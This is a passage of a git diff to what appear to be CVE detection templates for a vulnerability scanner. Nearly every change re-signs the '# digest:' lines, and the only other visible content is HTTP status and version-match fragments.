4a0a0047304502207d896bbbba4c3e917c08a5e5584112f3f3ce26a7ebd959272ebe9194cf2879a8022100e209184d4def5d6e1137285852b0098866b7b9b8487915bdc161550302c42bae:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2010/CVE-2010-1657.yaml b/http/cves/2010/CVE-2010-1657.yaml index d2bb0f8837..254c871994 100644 --- a/http/cves/2010/CVE-2010-1657.yaml +++ b/http/cves/2010/CVE-2010-1657.yaml @@ -40,5 +40,4 @@ http: - type: status status: - 200 - -# digest: 4a0a00473045022100e74ccb3a7c207f7ddccfa313d0cebf28e9775e0fc407ead4ced14cb42b783fa002205f16d8b92e46d220461eca94530b1273cc2f86e63afac7d11152146b6d60440f:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a0047304502202271cfe0a642d2cb398d96385608046d91513ee80830d258cfbe12c56e88e07002210088ea95e1dfc6f075289a397b2b23fbdbaec9ebc8e3ff0539a65e8ceebc587696:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2010/CVE-2010-1658.yaml b/http/cves/2010/CVE-2010-1658.yaml index f8dab7b5ab..1dbcba4078 100644 --- a/http/cves/2010/CVE-2010-1658.yaml +++ b/http/cves/2010/CVE-2010-1658.yaml @@ -40,5 +40,4 @@ http: - type: status status: - 200 - -# digest: 4a0a00473045022100d4a8e3eb33ee5d76446639ad1574285cf465d2ce48e0b591a2342290a5685ae702201d198b36f500660aa6eed2e0a97f78924cb4f743c7d3f1f72d2296e3aea8ba8a:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a0047304502200c037ab3035207c4b3bf29b0922636065f8717cbbd9d87b8b801a7dc08b9eb2c022100b419338ce0d79d0b988fbc2ad1f2b0cd56224e06a8f0f819ebde59a8904a74a0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2010/CVE-2010-1659.yaml b/http/cves/2010/CVE-2010-1659.yaml index 40e0d7fa55..8e53d5e65e 100644 --- a/http/cves/2010/CVE-2010-1659.yaml +++ b/http/cves/2010/CVE-2010-1659.yaml @@ -41,5 +41,4 @@ http: - type: status status: - 200 - -# digest: 4b0a00483046022100b3e54f8c9fb2e0c4fab3c74381423f6dec0ffb9d3d97fef25f14b1596afad3e702210087d6e39155a534d3f59b29459c70ade379c00fce338d8b51a46700649d63ea55:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a0047304502210081e468735d3dec1567672c08f0895e004c8abd6d08021b2aab6c1569510633f8022055004662a2ad48781d4f849792c12f4cb38e6ae581443e2e69e1a00ae3250146:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2010/CVE-2010-1714.yaml b/http/cves/2010/CVE-2010-1714.yaml index a65e9658bb..94c93eff22 100644 --- a/http/cves/2010/CVE-2010-1714.yaml +++ b/http/cves/2010/CVE-2010-1714.yaml @@ -41,5 +41,4 @@ http: - type: status status: - 200 - -# digest: 4b0a00483046022100f9ac1449e7166ea07211b439b06b57b10215b8c503a7b81549b9795b4cf4f0e8022100de5cd0bfa251de674ab1a2fe02387a83414ed1404123e88b0f13ea33f2722b9b:922c64590222798bb761d5b6d8e72950 +# digest: 4b0a00483046022100e99afd8ef413ec5478b59cd76ccbb0711ac9cb76627bdcb5b71beaf18498b091022100e27b79ce21bd279075c3e769c5b7282049c4735bfe992d8d347300da994d4528:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2010/CVE-2010-1715.yaml b/http/cves/2010/CVE-2010-1715.yaml index 1c8185e5e3..f2f330a8e4 100644 --- a/http/cves/2010/CVE-2010-1715.yaml +++ b/http/cves/2010/CVE-2010-1715.yaml @@ -40,5 +40,4 @@ http: - type: status status: - 200 - -# digest: 490a0046304402204a9f33ceaf4552b19bfabc65d1ea2b5c12679367155d7d00c85c38377377d5b2022014f8823fd04f2a6492bac6328305f9ef7c7fee85a0baebf60d7501068aa79ef7:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a004730450221009ced416148d275a883b082cdb960d5fac29c07c25880245a9876c1230bda78a9022047f4f36f46494d7b8a1e7bb74dfa828eee7a84119f5bfd3e4d02c3f89eea51e2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2010/CVE-2010-1717.yaml b/http/cves/2010/CVE-2010-1717.yaml index b46f948c16..ac573b2f60 100644 --- a/http/cves/2010/CVE-2010-1717.yaml +++ b/http/cves/2010/CVE-2010-1717.yaml @@ -40,5 +40,4 @@ http: - type: status status: - 200 - -# digest: 4a0a0047304502207a58fa6f73ed33b73e01b4bf32b52161b83a9be7056497cb25ec2e75a8393c28022100ba5d8fd99fdaca7564de67303fe7d52e3fa913198d6d9b1c337dd70a0be6ec02:922c64590222798bb761d5b6d8e72950 +# digest: 490a0046304402202dc93d69595a1d78fb23074b828d6b1cb9cfa976b3fee74bc96b40d98d6625a3022011b9db7af0a40554fee363e6a6ec797ff2e3d0c71c63868574de9b537c13b594:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2010/CVE-2010-1718.yaml b/http/cves/2010/CVE-2010-1718.yaml index c317d5d83d..fd7bb6b220 100644 --- a/http/cves/2010/CVE-2010-1718.yaml +++ b/http/cves/2010/CVE-2010-1718.yaml @@ -38,5 +38,4 @@ http: - type: status status: - 200 - -# digest: 4b0a00483046022100ead8463e052d8569c99a81f151592098f6e7973e9489c2c9b077fb1144a03a13022100b59eeb42a75509c2290df2df34be24178b84053b76555998f1c179604f0102d9:922c64590222798bb761d5b6d8e72950 +# digest: 4b0a00483046022100c9509461148bd3a114a77b51ae1bba0c9f8cd9648f24021c6a87d7a565d8ad62022100a896daf24be38621478281e877bd91b7b9800c52de360728d4aa351dc7e7b9e0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2010/CVE-2010-1719.yaml b/http/cves/2010/CVE-2010-1719.yaml index a61f45d16f..b784d4210f 100644 --- a/http/cves/2010/CVE-2010-1719.yaml +++ b/http/cves/2010/CVE-2010-1719.yaml @@ -40,5 +40,4 @@ http: - type: status status: - 200 - -# digest: 4a0a00473045022100c736ad183e3a1991a74d8ea7713a1e122b94b8a6cca1bac5dadb5e538056f20202202f6927b3232b676bd7cb9cc19df23efe15422e1dfedc6e627374d8d996363715:922c64590222798bb761d5b6d8e72950 +# digest: 4b0a00483046022100962045769969c4997d263a943a9531d26975a2ce52111e493bf85062ab314cec022100e41dd688462134924b8a435cb86572c9e6479aeb27d92dac34904eed8f2eed83:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2010/CVE-2010-1722.yaml b/http/cves/2010/CVE-2010-1722.yaml index 0430ec3d01..e6d5bf8047 100644 --- a/http/cves/2010/CVE-2010-1722.yaml +++ b/http/cves/2010/CVE-2010-1722.yaml @@ -40,5 +40,4 @@ http: - type: status status: - 200 - -# digest: 4b0a00483046022100a56c41d189dbd74e5733002e3a7080757b56fb985d82efde87e7288e6fc23f1e022100defcc1f7c07cd8b8ac23f666bee1171363707e97eace2bcb566ff2e126c8c6bc:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a0047304502210087fa04fbb89bc25ed4fb5e33415e10d09e726e58a1f2c41c568ab6bcf5972eaf0220511a8f339004fd6fc91d998d02d85692e52fa07a7f722a4e023557314f5aecad:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2010/CVE-2010-1723.yaml b/http/cves/2010/CVE-2010-1723.yaml index d87f5bbb1f..e2ca4dec49 100644 --- a/http/cves/2010/CVE-2010-1723.yaml +++ b/http/cves/2010/CVE-2010-1723.yaml @@ -40,5 +40,4 @@ http: - type: status status: - 200 - -# digest: 4a0a004730450221008e415212fed9837ae64b2578175964319e96cca802be8218ceb92238bdac082d02207d9063eb5f7700e13da578004dae54446eec3944660224e892d0b44367970691:922c64590222798bb761d5b6d8e72950 +# digest: 4b0a00483046022100ae03dcb62fd0c6ecdc1546b57590d5feb9ee6b15c05e39df8a46f35e8da13ec40221009c27b3830d47f71f0f5ad1eaed02fe2227076fc94f37dd0ebaa694a5900d7d9a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2010/CVE-2010-1858.yaml b/http/cves/2010/CVE-2010-1858.yaml index 64d60e6ada..29cb90acb3 100644 --- a/http/cves/2010/CVE-2010-1858.yaml +++ b/http/cves/2010/CVE-2010-1858.yaml @@ -39,5 +39,4 @@ http: - type: status status: - 200 - -# digest: 490a00463044022077e1069306a69d7878054d386738efac9e6ef2d933d31dc78db80a1da4e857200220091ab38190d53e9147506aef193a634f26674f7ca1aa5a6a7815eaa3634205ef:922c64590222798bb761d5b6d8e72950 +# digest: 4b0a00483046022100c4f925c24767f3631065315c1bf00f83af6b2f3bb71396de1a680b3f394faaeb022100c5762907233be0360517e2d35d030d854ce2e67176bd690fe5f777d822007fb3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2010/CVE-2010-1870.yaml b/http/cves/2010/CVE-2010-1870.yaml index af3dfe6638..0ccf7ab4e4 100644 --- a/http/cves/2010/CVE-2010-1870.yaml +++ b/http/cves/2010/CVE-2010-1870.yaml @@ -40,5 +40,4 @@ http: - 'LISTSERV Maestro\s+[5678]' - 'Administration Hub 9\.0-[123456780]' - 'Administration Hub [5678]' - -# digest: 4a0a004730450221009241ef8962e29fcb188b23c07182936e5b79499d5efb4132b8d7378819e7748a02203bf9dd002a8edb03125008ccc26999b9b45bb9014501ec7d6d93979563daf04a:922c64590222798bb761d5b6d8e72950 +# digest: 4b0a00483046022100b329c5cb1bbe265994f00922016236163bb4883e16b0768fd695e75fc4a444b6022100d1e1c3c467329d88383d9564c23f50b61df48e17aea186ccab67b43e9b28af39:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2010/CVE-2010-1875.yaml b/http/cves/2010/CVE-2010-1875.yaml index e8733a0a73..c0c2ddf2b1 100644 --- a/http/cves/2010/CVE-2010-1875.yaml +++ b/http/cves/2010/CVE-2010-1875.yaml @@ -40,5 +40,4 @@ http: - type: status status: - 200 - -# digest: 4a0a00473045022100f055916a70612eb6431b3e138a757c59733b6ab9fba09cfb8835ba196a9a7b6902205b381f03db1df81a5b9879ebae0f0e99777517ccf6f1f7afdf485d8b49802679:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a0047304502204e8360374e73edc77051fbadb5360c6436de8961090618d1cb7f32c19087574e022100f0172d04df0dddfa143339ac62ba2198b45c93c472a8464cb98a9264d4ebbc18:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2010/CVE-2010-1878.yaml b/http/cves/2010/CVE-2010-1878.yaml index 89ac650d49..06567cfd88 100644 --- a/http/cves/2010/CVE-2010-1878.yaml +++ b/http/cves/2010/CVE-2010-1878.yaml @@ -40,5 +40,4 @@ http: - type: status status: - 200 - -# digest: 490a004630440220169dd3fafb59e52f868f6715df8e025039d8f100ac97fdb156ff790ad2a94da202206f051378506827cf8703d295cdc72e2e9571b496514f0e07f1f108238948397d:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a00473045022072359ac4b30064df3cf0dad59f5326eab26ffe7193051a6e459e1aca21725931022100d4c7f1944a04a8387c284f6dba58cad5aa03ed435bc8056b06d788be09d48a2b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2010/CVE-2010-1952.yaml b/http/cves/2010/CVE-2010-1952.yaml index 9d92311f55..6d43a2e9a9 100644 --- a/http/cves/2010/CVE-2010-1952.yaml +++ b/http/cves/2010/CVE-2010-1952.yaml @@ -39,5 +39,4 @@ http: - type: status status: - 200 - -# digest: 490a0046304402204bcf7fb22ed3ad985f018af24ca7c044a97ef7917669d87fd982b3e5eb54f37002203c34ebecd7daeb197b8ccb541b2e05ca0b7bfef368a6892c62757e2ec54d6d65:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a00473045022046b635f592a54188965e0a5e5cdf68fe4733d6232e153bcd0da4de2d5b64a19f0221009eac36498a10b7b3571173996a85d949cd6949ddad76f813a4460a176548cff8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2010/CVE-2010-1953.yaml b/http/cves/2010/CVE-2010-1953.yaml index 9b37f437ea..1a1c713bee 100644 --- a/http/cves/2010/CVE-2010-1953.yaml +++ b/http/cves/2010/CVE-2010-1953.yaml @@ -39,5 +39,4 @@ http: - type: status status: - 200 - -# digest: 4b0a00483046022100e5c1164df8f6e4b9f3a5154c97d4403003cf011883cb7942cde48e0bf847bf59022100ebed4e3152dcaee899625d443b98391d036edf2d1c140383d7d73403da344a99:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a0047304502205a702432e1b6e25c0ebe75e1f699044bd129a8dee2cd5984eb730e24995a3a59022100d2e22ae223b11b063086aab4f2cfd6d94a19360adf4231ebaefce6dc8f65c7a0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2010/CVE-2010-1954.yaml b/http/cves/2010/CVE-2010-1954.yaml index 7b8b185bf5..84cdd351cd 100644 --- a/http/cves/2010/CVE-2010-1954.yaml +++ b/http/cves/2010/CVE-2010-1954.yaml @@ -39,5 +39,4 @@ http: - type: status status: - 200 - -# digest: 490a00463044022013020f16aa00712d23bf67e3607db09ddf2b519c1b3824d237d3297541e265ab022063a1a7189629d8b7da8ce4c6b3e78ce2044fd956417fe3fbc61239ca10557623:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a0047304502202609f4a1723693b4129fe03e70b84bfbc2fa1f2b2be01b7c1aa2629b82e2cdcc0221009af449722da005b8faccd029ec98177d9ad9cd5456d85a206a0d7c794b909d8c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2010/CVE-2010-1955.yaml b/http/cves/2010/CVE-2010-1955.yaml index e7d2da299f..6cd2e82fd1 100644 --- a/http/cves/2010/CVE-2010-1955.yaml +++ b/http/cves/2010/CVE-2010-1955.yaml @@ -38,5 +38,4 @@ http: - type: status status: - 200 - -# digest: 4a0a00473045022100ff9bace3ad4d9c5413bd99774062345c0a1194fe8e83675ca06a495519e9225302204041073f62019a854abdea81424111ecd9cbff7befe27d88dc58bd8bd32ce3b2:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a00473045022016dbc21e850111b5b21523859c665159d8a950aba0468e2655a390c0888250df02210095022668966d51e9084b798a2953cae31dd04efd062f76c538cf54bf0affade4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2010/CVE-2010-1956.yaml b/http/cves/2010/CVE-2010-1956.yaml index 3472a2d27d..63e6a857cd 100644 --- a/http/cves/2010/CVE-2010-1956.yaml +++ b/http/cves/2010/CVE-2010-1956.yaml @@ -40,5 +40,4 @@ http: - type: status status: - 200 - -# digest: 490a004630440220529813ba394bd87144f178d5a0faa72c7459ea8d5c9ae316c8e2b172ba0757ab0220098a33a4812e936d32eacc1cc28ea1bd30c091fad8368a10df4f394f0b6da3ac:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a004730450220736a132e33c653e1b1c286c766d46b72cb3ef4de6885f11fd2702c693958c635022100c7513e68c3b1a4bae01d9ac045eb4b480e63cadf3356200a367a8ed83ce021c4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2010/CVE-2010-1957.yaml b/http/cves/2010/CVE-2010-1957.yaml index 2f75eff98d..97749efe65 100644 --- a/http/cves/2010/CVE-2010-1957.yaml +++ b/http/cves/2010/CVE-2010-1957.yaml @@ -39,5 +39,4 @@ http: - type: status status: - 200 - -# digest: 4a0a00473045022001153bd4c586577ab34538c2a16ab51b4bb7110e1fb6804fc344e2eeed35540a022100c0afdc73ea5cc9960b30293f1bc610eecf40b67bda0867c5045a11757410de4a:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a0047304502201b8b4dc9f6a1f8d1acde4daa4a43ddd9eeb16c27a2cae1c474b09801c1148dae0221008c3a36c80be7819d0f9c4e6609b5dad847ae9983a59fb82df75a828058d2dcba:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2010/CVE-2010-1977.yaml b/http/cves/2010/CVE-2010-1977.yaml index ec8b91290e..e2986e1815 100644 --- a/http/cves/2010/CVE-2010-1977.yaml +++ b/http/cves/2010/CVE-2010-1977.yaml @@ -37,5 +37,4 @@ http: - type: status status: - 200 - -# digest: 4b0a00483046022100dd1deeeb640858fab6dc6e4781f444232b1b099a9ba507f1431151db63915495022100d10cebf402646c905f85fe3b51962ea0d1e1ebb54ef6b59fc3b629cc61ca36ad:922c64590222798bb761d5b6d8e72950 +# digest: 4b0a00483046022100e59dd1e4f604db48416e708e4f13368dd9e0a1c4c48e5d42cb723860c111187c022100b38779e7b48b38e51eabf20e025d5b2ef69f75c9e0bd984094fdbc0a947420da:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2010/CVE-2010-1979.yaml b/http/cves/2010/CVE-2010-1979.yaml index 8e88d2d7fc..a6c16b38b8 100644 --- a/http/cves/2010/CVE-2010-1979.yaml +++ b/http/cves/2010/CVE-2010-1979.yaml @@ -39,5 +39,4 @@ http: - type: status status: - 200 - -# digest: 490a0046304402202f56fd10b79ca7f234f9482fd6d81b47a6868b4bcefe4d082c26be91253810e40220121399e8cb055b50d29ba963c62a76d50f63fe5474e6ccd7b239231ada389eb1:922c64590222798bb761d5b6d8e72950 +# digest: 4b0a00483046022100d123bca3ea0c94069a1138f53357b2baa6b263f0730271aaf62c6b9e895e8e8202210088c808c3caa28441bae5d0ff2cb5a38eec06e4c7360b8271379cca1bc03ee6e9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2010/CVE-2010-1980.yaml b/http/cves/2010/CVE-2010-1980.yaml index b1a8a028d6..50cf3b1d08 100644 --- a/http/cves/2010/CVE-2010-1980.yaml +++ b/http/cves/2010/CVE-2010-1980.yaml @@ -40,5 +40,4 @@ http: - type: status status: - 200 - -# digest: 4a0a0047304502202c5c82f9653b9d0d2efdede3bb956c249a8df3109d86843bf3f29038f5ec981d022100d8a7dba9d0841f9ab1e94380b09b29ce0de303487b0a2de206227aa367071bf6:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a00473045022100f52fea369742b587bdeb6a4510001100bfca7bee095024dbb19748d52f63287a022024b5ff93ad6e4b85602a8fe52b65bb68168941eab51b8c6acb6a82ce853f6b86:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2010/CVE-2010-1981.yaml b/http/cves/2010/CVE-2010-1981.yaml index 874852f247..9cea9a5857 100644 --- a/http/cves/2010/CVE-2010-1981.yaml +++ b/http/cves/2010/CVE-2010-1981.yaml @@ -41,5 +41,4 @@ http: - type: status status: - 200 - -# digest: 490a00463044022017af2cb16c457798410e097b2f66dc58de42011c0a630b04816d0cbb0d0ca1640220106515bd9520493c232257d1c2ede5d3d99758ec81df840feab281a8d6b0089e:922c64590222798bb761d5b6d8e72950 +# digest: 490a00463044022009262c775a76c0a8e1e22d1f47f1ee9ad2211816b80ac78edde7115fba73b47002202eea95bb61b195e5f627156ec4a595ec6d6ea6f93c4b2831ba081e76aca1c150:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2010/CVE-2010-1982.yaml b/http/cves/2010/CVE-2010-1982.yaml index aafcdb248d..69d9fde3b0 100644 --- a/http/cves/2010/CVE-2010-1982.yaml +++ b/http/cves/2010/CVE-2010-1982.yaml @@ -37,5 +37,4 @@ http: - type: status status: - 200 - -# digest: 4a0a00473045022041f28b9b60c832720339128c13e6628694bf291e960463a46dede0abe0234de4022100a7ccd124a3a57b576bb923fa1c67a7a0592db2202c3f1e1cf4139438692d1bf5:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a0047304502203aea5daf7fa66ab3640f96e684a914df8a9f61b127f2c518ad4b9ba1c0f77bc1022100c2ec951fa58c94ebd5a798dbaf58a7e739b47a39d15e97c413561c6d9e34cda9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2010/CVE-2010-1983.yaml b/http/cves/2010/CVE-2010-1983.yaml index 26951bc845..e63c5e2535 100644 --- a/http/cves/2010/CVE-2010-1983.yaml +++ b/http/cves/2010/CVE-2010-1983.yaml @@ -40,5 +40,4 @@ http: - type: status status: - 200 - -# digest: 4a0a0047304502206b9a15ae16924dc0224a586e57a2abf50ca1df171ac47d5b46a56d149d18ca17022100a18c8de520ad0f92eda881f4a4fcba0df81c6aa979da2036d170338ef525dc2d:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a00473045022100d6f45e6495c5d6162878a730f62375b52c284a3f3553b11bafa82cfdd0ac2c32022017959005b160947a5fb48ae235e11a40527018a48deb3abb42a1eba5a86874c0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2010/CVE-2010-2033.yaml b/http/cves/2010/CVE-2010-2033.yaml index 2494a736ec..f2684609d0 100644 --- a/http/cves/2010/CVE-2010-2033.yaml +++ b/http/cves/2010/CVE-2010-2033.yaml @@ -37,5 +37,4 @@ http: - type: status status: - 200 - -# digest: 4a0a0047304502206bdeca50bed655fc59323d4cac8aa544f941dc4255bdebf43d0a2d47facf546f022100b791feabc54e75f2da55f5e1fa17f309b65f574f601fcaace90819927964de80:922c64590222798bb761d5b6d8e72950 +# digest: 4b0a00483046022100d41f436574119575e273ff2409cedef0c3d436ee103513cf84ed17a467608c2b022100b5f61bd42557f57eb5213c5963c7dc202a28b86a099324c08d3ac29acbb7652c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2010/CVE-2010-2034.yaml b/http/cves/2010/CVE-2010-2034.yaml index 4ab9ff5c03..e675f2d664 100644 --- a/http/cves/2010/CVE-2010-2034.yaml +++ b/http/cves/2010/CVE-2010-2034.yaml @@ -39,5 +39,4 @@ http: - type: status status: - 200 - -# digest: 4a0a00473045022100bbe86d9d9523658fc16986533f35493b169eed9ea9414744e4700ac70e4f4086022007f37655be989db8e046d9220a1b5fbad2937ee7f582882ac201c03c6dd5c86a:922c64590222798bb761d5b6d8e72950 +# digest: 4b0a0048304602210088c32af5b4a6b83ed97a60555f0f466b5644fc508667233e490747caf8e2a6cc022100f5828722b6afbc7c4db720842ade90f2597751d59e101496aee12ccacf442353:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2010/CVE-2010-2035.yaml b/http/cves/2010/CVE-2010-2035.yaml index d6e560c201..bddbb7a022 100644 --- a/http/cves/2010/CVE-2010-2035.yaml +++ b/http/cves/2010/CVE-2010-2035.yaml @@ -39,5 +39,4 @@ http: - type: status status: - 200 - -# digest: 4a0a00473045022100d307c4c3d319ff65b68f20279048cdf7af787ce7def0aea9938815e2efeb2987022008dd575b88e1a9e2a1238b686af9a19435af5f1fb55862df154b22090faccffd:922c64590222798bb761d5b6d8e72950 +# digest: 490a0046304402204ea00a029249988d909d3ca3d899bbfac43d6de2377e3ca2f9f2b4e16cf4861102207aacde612b6bb1f9e52141e8420c5d9fa32d66213071c8ad7fad1641541de251:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2010/CVE-2010-2036.yaml b/http/cves/2010/CVE-2010-2036.yaml index 29a086ba8a..d997b85289 100644 --- a/http/cves/2010/CVE-2010-2036.yaml +++ b/http/cves/2010/CVE-2010-2036.yaml @@ -39,5 +39,4 @@ http: - type: status status: - 200 - -# digest: 4a0a004730450220439f41288b2dd271c8c2c9705eddfa1470b57883c7795ec8050f7b4796d08126022100eac4ace6d64b5a45515763927405e524cad16a412563c4bedcb8f52f53438d70:922c64590222798bb761d5b6d8e72950 +# digest: 4b0a00483046022100be5781f1ab9e0bc8c86215f610a80a2c045dad202bc9600a41a1f2d2275fc56c0221009063a819d9f58284dbe335142ea78d9ddadf8e6364441a48a18fde19956305e8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2010/CVE-2010-2037.yaml b/http/cves/2010/CVE-2010-2037.yaml index 0b8d4a728f..a05c1ba090 100644 --- a/http/cves/2010/CVE-2010-2037.yaml +++ b/http/cves/2010/CVE-2010-2037.yaml @@ -39,5 +39,4 @@ http: - type: status status: - 200 - -# digest: 4a0a00473045022051dd1a2971ac60cd8aaa3d8e0bfea8a645367340144b6b5ce3af6cbfa913b3e5022100ff7ac5501f2a0c5906e2e2a7101ebe1b407bafe3727f2e0b201dd3c0ab0ea08c:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a00473045022044315b36a892cc1181f228d70b026c3282cec9552b817b50e20b21dc03c2b69c0221008bc2580a6513232b9458d5516a49e45eaeb51c76ab4fdcdc0c74af5a235e8663:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2010/CVE-2010-2045.yaml b/http/cves/2010/CVE-2010-2045.yaml index eceb2717a8..0651855b39 100644 --- a/http/cves/2010/CVE-2010-2045.yaml +++ b/http/cves/2010/CVE-2010-2045.yaml @@ -39,5 +39,4 @@ http: - type: status status: - 200 - -# digest: 490a0046304402201846af279b66a19513846268522d691e625844597e8ee7a356c7585480c5527e022019975df26ed3ec6c4afc4197d556b7015ce29bf8606b06dce93cf9fe0607642f:922c64590222798bb761d5b6d8e72950 +# digest: 490a0046304402206bbca93b949a410b24aafbc080925392ec68820eaa4e88e4df0d058ac9c7a7cb02205e3af469d2ff9ceddd1abc5684e760e5ff9a8e5ce156c35d7f75edbc442c49d4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2010/CVE-2010-2050.yaml b/http/cves/2010/CVE-2010-2050.yaml index 3d9589a60a..b2334e9867 100644 --- a/http/cves/2010/CVE-2010-2050.yaml +++ b/http/cves/2010/CVE-2010-2050.yaml @@ -40,5 +40,4 @@ http: - type: status status: - 200 - -# digest: 4a0a00473045022009341920ee57d502146d56afbe3144e63ea4c6e5cc90526578eade41c781a368022100894fdb596912bcde801023a5ca24178dff0d1ea6b5851146f3bf468dc5724439:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a004730450220130b9443ac967148ef71541179113012a13c04f86e1f75015fb3f20ec0b6f9ce022100d749d5846b68e04eae01c779e092558cdd2dc4b3bb84ccf4370048f079f3f4a7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2010/CVE-2010-2122.yaml b/http/cves/2010/CVE-2010-2122.yaml index 868c5cc194..6a5f1a3049 100644 --- a/http/cves/2010/CVE-2010-2122.yaml +++ b/http/cves/2010/CVE-2010-2122.yaml @@ -40,5 +40,4 @@ http: - type: status status: - 200 - -# digest: 4b0a00483046022100896cafd4a2c311772409cabb83525eb792a0c27eb7772086de18730feb42b081022100d678e6dc212694a3307661bed59f6475600010d05288d99c9a210a2dfc5b3652:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a00473045022100d7ec4e12156e282b80e8fb2be695fe229511c23df5354241297041bc67b51931022003e16bc10a80394fd41a6351ce85b932dc761590c505c7f252d59211b26e0939:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2010/CVE-2010-2128.yaml b/http/cves/2010/CVE-2010-2128.yaml index c4427085b3..4fd020b0d3 100644 --- a/http/cves/2010/CVE-2010-2128.yaml +++ b/http/cves/2010/CVE-2010-2128.yaml @@ -39,5 +39,4 @@ http: - type: status status: - 200 - -# digest: 4a0a00473045022023f8ab58caa0c6b4e5ae4e6368f5731b4992104c3eb730a274f77c14b718d58e022100dd550e9aa9121cd0ecf5c0c979753d8695fd90574ca8e087b69f47844c790aea:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a00473045022100ec838d4b6c965e7b8a9d0820f8cf62c6ed69b796587343e8469e97c658dc2749022003c90aeaf54ba8903688839eaf3faa56b237bf6fba4db0b169110d0dbd82d4aa:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2010/CVE-2010-2259.yaml b/http/cves/2010/CVE-2010-2259.yaml index d5c4a23f8e..0b969b2075 100644 --- a/http/cves/2010/CVE-2010-2259.yaml +++ b/http/cves/2010/CVE-2010-2259.yaml @@ -39,5 +39,4 @@ http: - type: status status: - 200 - -# digest: 4b0a00483046022100f4eb3a5794838de36d70b6cb2ef68edd5d8776d7950b78ee6fc79d9df03b31a2022100c57588816d183e107b24f8496922ed71b52f17c1b0cb7a5062dc2cf198e1d4a1:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a004730450221008521d91eb78cbddb122b1d595771d5ec8256fba7c50123876642c73d5bc6b08002201e1c43b648341e8edfc3eed9dee0e429c1f2a2a2c5de46bdecd75f210e7ecbe7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2010/CVE-2010-2307.yaml b/http/cves/2010/CVE-2010-2307.yaml index ebe0676c1b..10b7842c6e 100644 --- a/http/cves/2010/CVE-2010-2307.yaml +++ b/http/cves/2010/CVE-2010-2307.yaml @@ -39,5 +39,4 @@ http: - type: status status: - 200 - -# digest: 4b0a004830460221008132b24316397c150367dcc7da5265a6d27c61a222c728b3a9e53f58a2f2c648022100c1b9db7b6e6567df34fccd47a3a72a27be3cfbf89aa94bf72e03d8d27695db40:922c64590222798bb761d5b6d8e72950 +# digest: 490a0046304402207878441ebd99b9ed74b24b4a4f41ed74f7016a5e390403adb2add467c3f3ec10022047852ed306f2ba524cecfbe6ca09ccb77fb17ac986b3f11690049fa16422c293:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2010/CVE-2010-2507.yaml b/http/cves/2010/CVE-2010-2507.yaml index b9d074b3db..321062e2d1 100644 --- a/http/cves/2010/CVE-2010-2507.yaml +++ b/http/cves/2010/CVE-2010-2507.yaml @@ -39,5 +39,4 @@ http: - type: status status: - 200 